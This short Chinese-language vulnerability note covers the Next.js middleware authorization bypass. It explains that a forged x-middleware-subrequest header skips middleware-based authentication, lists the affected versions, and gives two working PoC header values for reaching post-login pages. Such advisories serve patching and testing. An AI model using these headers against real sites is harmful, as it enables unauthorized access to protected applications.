漏洞介绍

1
2
该漏洞成因是框架中用于标记中间件递归请求的特殊请求头x-middleware-subrequest可被用户伪造,
导致中间件处理链被绕过,进而影响基于中间件实现的身份认证、重定向等关键安全逻辑。

影响版本

1
2
3
11.1.4 < Next.js ≤ 13.5.6
14.0 < Next.js < 14.2.25
15.0 < Next.js < 15.2.3

验证 POC(添加特定请求头即可绕过验证进入登录后的界面)

1
2
3
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
或者
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware